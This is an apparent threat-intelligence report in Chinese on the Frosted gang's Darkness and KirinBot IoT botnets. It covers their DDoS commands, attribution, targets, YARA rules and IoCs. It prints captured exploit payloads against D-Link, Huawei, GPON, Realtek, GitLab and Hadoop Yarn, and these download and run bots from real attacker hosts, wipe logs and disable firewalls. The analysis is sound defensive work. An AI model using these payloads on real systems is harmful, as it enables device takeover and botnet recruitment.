概述
对该僵尸网络进行溯源时我们发现,CNCERT 物联网威胁研究团队和绿盟科技伏影实验室于2022年12月发表的一份联合报告对本次发现的僵尸网络作者曾进行过披露,并将该僵尸网络犯罪团伙命名为 Frosted,我们猜测是通过僵尸网络作者的ID进行团伙的命名,本文将详细披露 Frosted 僵尸网络犯罪团伙。(下文中将该僵尸网络称为 Darkness)
Darkness Botnet 近90天传播趋势如下:
僵尸网络武器库
DarknessQbot
2023 年 6月初,奇安信威胁情报中心威胁监控系统监测到一起未知家族恶意样本利用CVE-2021-22205漏洞传播的事件,经过分析确认该样本不属于已知的僵尸网络家族。通过对该家族的特征进行分析,我们将此新型僵尸网络称为 DarknessQbot。
对该僵尸网络进行分析,该家族通过几个流行的恶意软件家族(Mirai、Gafgyt 和 Qbot)的代码创建而成,其支持的DDoS攻击方法如下:
Usage | Name |
!udp <target> <port> <time> <packetsize> | udpflood |
!tcp <target> <port> <time> <packetsize> <flag(s)> | tcpflood |
!onepacket <target> <port> <time> | onepacket |
!zgoflood <target> <port> <time> | zgoflood |
!socketflood <target> <port> <time> | socketflood |
!junkflood <target> <port> <time> | junkflood |
!std <target> <port> <time> <packetsize> | stdflood |
!randflood <target> <port> <time> <packetsize> | randflood |
@c2 <c2 ip> <c2 port> <seconds> <threads> | c2flood |
DarknessQbot 支持下发指令调用 mirai 的 killer_init 方法,同时保留了 table 加密特性以防止安全人员对内存搜索其特征:
DarknessQbot 支持下发指令激活两种方法进行漏洞扫描从而大规模传播,分别针对 D-Link 和华为路由器,payload EXP 如下:
GET /login.cgi?cli=aa ;wget http://nomiddleman.ddns.net/nips -O /tmp/vv ;sh /tmp/vv ;wget http://nomiddleman.ddns.net/bob -O /tmp/cc ;sh /tmp/cc ;wget http://nomiddleman.ddns.net/forearm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: /\r\nUser-Agent: Blade/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;
华为路由器 CVE-2017-17215:
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nContent-Length: 430\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget http://nomiddleman.ddns.net/nips -O /tmp/vv; /bin/busybox chmod 777 * /tmp/vv; sh /tmp/vv)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
KirinBot
Darkness作者还拥有一个名为 Kirin 的僵尸网络,发现时正通过漏洞 CVE-2021-22205 进行传播。
该僵尸网络使用 Gafgyt 源码进行修改,其上线包中包含特征字符串 "Kirin":
Kirin 支持多种 DDoS 方法如下:
Name |
HEX |
UDP |
VSE |
STD |
ACK |
ONEPACKET |
ZGO |
SOCKET |
UDPBYPASS |
LYNX |
POST /GponForm/diag_Form?images/ HTTP/1.1\r\nUser-Agent: Hello, World\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://37.44.238.182/gpon+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0")
REALTEK CVE-2014-8361:
POST /picsdesc.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`wget http://37.44.238.182/real.sh -O - > /var/fkra;sh/var/fkra`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n")
样本中内置的弱口令与Mirai类似,利用 table 的方式异或解密:
除了上述的指令,KirinBot 还支持 Update 及 Kill 命令进行样本更新和结束指定进程。
Mirai_Fro、Gafgyt_Fro
这两个家族使用传统的 Mirai 和 Gafgyt 源码,在CNCERT 物联网威胁研究团队和绿盟科技伏影实验室披露“Frosted”僵尸网络犯罪团伙的文章中提起。
rule Mirai_Fro
{
meta:
author = "WPeace"
strings:
$elf = "\x7FELF"
$onlinePack = "Device Connected"
$commandStr_0 = "NOOOOOOOOOOOOOOOOOOOO"
$commandStr_1 = "KPAC"
$commandStr_2 = "DAVE"
$commandStr_3 = "NFODROP"
$commandStr_4 = "STOP"
condition:
all of them
}
rule Gafgyt_Fro
{
meta:
author = "WPeace"
strings:
$elf = "\x7FELF"
$authorStr = "FrostedFlakes666"
$onlinePack = "Kansen shita"
$commandStr_0 = "CMD"
$commandStr_1 = "CREG"
$commandStr_2 = "KPAC"
$commandStr_3 = "GETPUBLICIP"
condition:
all of them
}
更多的漏洞利用
除了利用样本中的漏洞扫描方法以外,攻击者通常会通过扫描器利用漏洞 CVE-2021-22205 传播其拥有的多个僵尸网络家族二进制文件,并且存在同一个 payload 下发多个家族样本的情况,示例如下:
(metadata.(Copyright "\" . qx{TF=$(mktemp -u);mkfifo $TF && rm -rf roof;wget http://37.44.238.182/bins/kirin.x86 ; chmod 777 * ; ./kirin.x86 ;rm -rf kirin.x86; wget http://37.44.238.191/roof; curl -O http://37.44.238.191/roof; chmod +x roof; ./roof x86 0<$TF | sh 1>$TF} . \" b ")
另外还发现了该攻击者利用 Hadoop Yarn 未授权漏洞诱骗服务器下载并运行其僵尸网络文件:
/ws/v1/cluster/apps
{"am-container-spec": {"commands": {"command": "cd /tmp ; pkill -9 roof ; get
http://37.44.238.191/roof; chmod 777 *; ./roof x86; rm -rf roof ; history -c"}}}
攻击者溯源分析
Darkness僵尸网络作者最初的动机似乎只是为了自用,但后续逐步创建了自己的僵尸网络租赁团伙以此来获取收益,查看该作者的加密货币钱包,能够看出该作者通过自己的僵尸网络获取过多笔收益并且提现(这两个钱包仅是作为对作者的捐赠,并不计入 Botnet 租赁的收入):
Darkness僵尸网络的作者经常在其推特及 YouTube 账号发布 DDoS 攻击相关推文和视频推广其僵尸网络,不仅仅是为了证明其僵尸网络威力和有效性,还有以炫耀的目的博取眼球,有时甚至会艾特受害者告知其是被自己的买家所攻击:
该作者还炫耀过自己团队用黑客产业所赚取的费用(可以看出来确实挺赚钱的 /doge):
进行追踪时我们发现,Darkness僵尸网络的作者声称自己来自国际黑客组织 LateSec,并且曾经有过网站想暗示其 Lizard Squad 团队成员身份,但是经过分析其黑客组织身份可信度较低:
规模及攻击目标
该僵尸网络还对多个游戏服务器进行过攻击,于2022年5月攻击了 Rogue Company 服务器,2022年6月攻击了 AmongUs 服务器:
奇安信威胁情报中心当前已对 Frosted 团伙的 Darkness 僵尸网络进行监控,并在分析过程中获取到了攻击者下发的若干攻击指令:
IoCs
1F972A1CE378A6BD1320523D9A7E5707
6714908C334E2A324AAC93E9886F9660
742D719FA396FA41442BB8B6285FCD64
47024197FAF8C15A5C606A65D2205104
C&C:
193.35.18.220:420
193.35.18.220:101
5.252.177.118:998
178.63.167.41:26663
点击阅读原文至ALPHA 6.0
即刻助力威胁研判
如有侵权请联系:admin#unsafe.sh